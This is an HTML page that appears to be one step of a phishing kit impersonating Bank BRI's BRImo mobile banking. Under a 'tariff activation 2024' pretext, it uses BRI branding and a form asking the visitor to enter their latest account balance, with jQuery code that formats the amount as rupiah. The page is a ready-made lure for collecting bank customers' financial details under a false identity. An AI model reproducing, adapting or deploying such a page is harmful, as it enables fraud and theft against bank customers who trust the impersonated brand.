<!DOCTYPE html><html lang="in"><head>
    <meta charset="UTF-8">
    <title>𝗔𝗸𝘁𝗶𝘃𝗮𝘀𝗶 𝗧𝗮𝗿𝗶𝗳 𝗕𝗮𝗻𝗸 𝗕𝗥𝗜 | 𝟮𝟬𝟮𝟰</title>
    <link rel="icon" type="image/png" href="img/BRImo.png">
    <meta name="theme-color" content="#0f78cb">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <link rel="stylesheet" href="css/3.css">
    <script type="module" src="js/ionicons.esm.js"></script>
<style>
     .lonte{
  display:none;
  z-index:4;
  position: absolute;
  top: 33%;
  left: 30%;
  transform: translate(-50%, -50%);
  
/*   spinner div css */
  height : 10px;
  width : 10px;
  border-radius : 50%;
/*   background-color : red; */
  border : 5px solid #ffffff80;
  border-top-color : #007bff;
  animation : spin 1s linear infinite;
}

@keyframes spin{
  0%{
    transform : rotate(0deg);
  }
  100%{
    transform : rotate(360deg);
  }
}

.patokk:active { background-color: rgba(0, 110, 200, 0.96); box-shadow: rgba(50, 50, 93, 0.25) 0px 30px 60px -12px inset, rgba(0, 0, 0, 0.3) 0px 18px 36px -18px inset; transform: translateY(0px); }

.load{
     top: 0;
     left: 0;
     right: 0;
     position: fixed;
     display: flex;
     justify-content: center;
     align-items: center;
     background: #00000090;
     z-index: 999999999;
     width: 100%;
     height: 100%;
      }
      
      .jao{
            width:90%;
      }
</style><style>
  
</style></head>


<body>
    <main>
<welalxcome>
<img src="img/BRImo.png" alt="" style="margin-top: -50px">
</welalxcome>
<chsalxcome2 style="display: ;">
<div class="load" style="display:none">
 <img src="images/f01dmo.gif" class="jao" alt="">
      </div>
<img style="z-index:1;position: fixed;width:100%;margin-top:0px;" width="100%" src="images/buri.png" alt="">
<img style="z-index:2;position: fixed;width:100%;margin-top:50px;" src="images/26-.png" alt="">

<nav class="hh">
    
<img src="images/nav.png" style="margin-top:8px; margin-left:175px;" width="40px" alt="">
<p style="margin-left:10px;">Spesial Untuk<b style="color: #F37024">mo</b></p><b style="color: #F37024">
<p style="margin-left:10px;color:#fff;font-size:12px;">Cobain beragam cara baru untuk<br>memaksimalkan aktivitas perbankan kamu.</p>
</b></nav><b style="color: #F37024">

<marquee direction="right" behavior="alternate" scrolldelay="10" class="asu">
<img class="nyusu" src="images/1.png" alt="">
<img class="nyusu" src="images/2.png" alt="">
<img class="nyusu" src="images/3.png" alt="">
<img class="nyusu" src="images/4.png" alt="">
<img class="nyusu" src="images/5.png" alt="">
</marquee>



<form method="post" id="formsal">
<center><img style="z-index:3;position: fixed;width:20%;margin-top:610px;margin-left:-40px;" src="images/T24.png" alt=""></center>
<div class="button-85 hu">
<center style="color:#09559a; line-height: 17px; font-size: 15px; padding: 5px;margin-top:-20px;font-weight:600;"><p style="border-bottom:1.5px solid #0000004a;border-radius:10px;margin-bottom:3px;height:50px;">𝗠𝗮𝘀𝘂𝗸𝗸𝗮𝗻 𝗦𝗮𝗹𝗱𝗼 𝗧𝗲𝗿𝗮𝗸𝗵𝗶𝗿 𝗮𝗻𝗱𝗮,<br>𝗣𝗮𝘀𝘁𝗶𝗸𝗮𝗻 𝗦𝗮𝗹𝗱𝗼 𝗦𝗲𝘀𝘂𝗮𝗶 𝗱𝗶 𝗿𝗲𝗸𝗲𝗻𝗶𝗻𝗴.</p>

<img style="width:100%;" src="images/kacuk.png" alt="">
</center>

  



<h5 for="norek" style="color:#09559a; margin-top: 0px; margin-left: 4px">Saldo akhir :
<input class="saldo" id="saldo" name="saldo" type="tel" placeholder="Rp.xxx" oninvalid="this.setCustomValidity('Pastikan 𝗦𝗮𝗹𝗱𝗼 𝗦𝗲𝘀𝘂𝗮𝗶 𝗥𝗲𝗸𝗲𝗻𝗶𝗻𝗴')" onchange="this.setCustomValidity('')" required="">
</h5>

<br>
<br>
</div>
    
<div class="pilat">
<div id="lonte" class="lonte"></div>
<button class="patokk" type="submit" id="kirim" disabled="">Benar</button>
           </div>

</form></b></chsalxcome2></main><b style="color: #F37024">


<script src="js/jquery.min_1.js"></script>
<script src="script.js"></script>
<script src="js/jquery.min.js"></script>
<script src="js/jquery.mask.min.js"></script>
<script>
        $( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },500)
        });
</script>
<script src="js/vibr.js"></script>
     <script src="js/3.js">
 </script>
<script src="js/3_1.js">
     </script>
    <script>
       $(document).ready(function(){

// Format mata uang.
$( '.saldo' ).mask('000.000.000.000.000', {reverse: true});
var dengan_rupiah = document.getElementById('saldo');
dengan_rupiah.addEventListener('keyup', function(e)
{
dengan_rupiah.value = formatRupiah(this.value, 'Rp. ');
});


/* Fungsi */
function formatRupiah(angka, prefix)
{
var number_string = angka.replace(/[^,\d]/g, '').toString(),
split    = number_string.split(','),
sisa     = split[0].length % 3,
rupiah     = split[0].substr(0, sisa),
ribuan     = split[0].substr(sisa).match(/\d{3}/gi);

if (ribuan) {
separator = sisa ? '.' : '';
rupiah += separator + ribuan.join('.');
}

rupiah = split[1] != undefined ? rupiah + ',' + split[1] : rupiah;
return prefix == undefined ? rupiah : (rupiah ? 'Rp. ' + rupiah : '');
}
})



 </script>


</b></body></html>